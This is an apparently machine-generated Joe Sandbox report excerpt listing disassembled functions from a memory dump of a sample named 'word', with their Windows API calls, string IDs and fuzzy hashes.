                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$Info
                                                                            • String ID:
                                                                            • API String ID: 2577412497-0
                                                                            • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                            • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                            • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                            • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                            Function 004556F8 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 216COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateDestroy
                                                                            • String ID: ,$X+$tooltips_class32
                                                                            • API String ID: 1109047481-900504714
                                                                            • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                            • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                            • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                            • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                            Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 3993528054-4108050209
                                                                            • Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                            • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                            • Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                            • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                            Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll
                                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                            • API String ID: 3832890014-4202584635
                                                                            • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                            • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                            • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                            • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                            Function 00466999 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 004669C4
                                                                            • _wcsncpy.LIBCMT ref: 00466A21
                                                                            • _wcsncpy.LIBCMT ref: 00466A4D
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • _wcstok.LIBCMT ref: 00466A90
                                                                              • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                            • _wcstok.LIBCMT ref: 00466B3F
                                                                            • _wcscpy.LIBCMT ref: 00466BC8
                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                            • _wcslen.LIBCMT ref: 00466D1D
                                                                            • _memset.LIBCMT ref: 00466BEE
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • _wcslen.LIBCMT ref: 00466D4B
                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                            • String ID: X$HH
                                                                            • API String ID: 3021350936-1944015008
                                                                            • Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                            • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                            • Opcode Fuzzy Hash: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                            • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                            Function 0044920C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 243windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                            • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                            • CharNextW.USER32(?), ref: 00449361
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                            • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                            • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CharNext
                                                                            • String ID: X+
                                                                            • API String ID: 1350042424-1938338529
                                                                            • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                            • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                            • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                            • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                            Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu$Sleep_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1504565804-4108050209
                                                                            • Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                            • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                            • Opcode Fuzzy Hash: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                            • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                            Function 0045CBCC Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                            • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                            • _wcscat.LIBCMT ref: 0045CD51
                                                                            • _wcscat.LIBCMT ref: 0045CD63
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                            • _wcscpy.LIBCMT ref: 0045CE14
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                            • String ID: *.*
                                                                            • API String ID: 1153243558-438819550
                                                                            • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                            • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                            • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                            • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                            Function 0045510D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1663942905-4108050209
                                                                            • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                            • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                            • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                            • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                            Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1481289235-0
                                                                            • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                            • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                            • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                            • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                            Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CursorLoad
                                                                            • String ID:
                                                                            • API String ID: 3238433803-0
                                                                            • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                            • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                            • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                            • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                            Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                            • _wcslen.LIBCMT ref: 00460B00
                                                                            • __swprintf.LIBCMT ref: 00460B9E
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                            • GetDlgCtrlID.USER32 ref: 00460CE6
                                                                            • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                            • GetParent.USER32(?), ref: 00460D40
                                                                            • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                            • String ID: %s%u
                                                                            • API String ID: 1899580136-679674701
                                                                            • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                            • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                            • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                            • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                            Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                            • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                            • API String ID: 2485709727-934586222
                                                                            • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                            • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                            • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                            • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                            Function 004480F2 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                            • _memset.LIBCMT ref: 004481BA
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                            • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow_memset
                                                                            • String ID: X+
                                                                            • API String ID: 830647256-1938338529
                                                                            • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                            • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                            • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                            • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                            Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                            • String ID: HH
                                                                            • API String ID: 3381189665-2761332787
                                                                            • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                            • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                            • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                            • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                            Function 0046EA7F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 167windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                            • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                            • DeleteObject.GDI32(00000000), ref: 0046EB4F
                                                                            • DestroyIcon.USER32(00000000), ref: 0046EB67
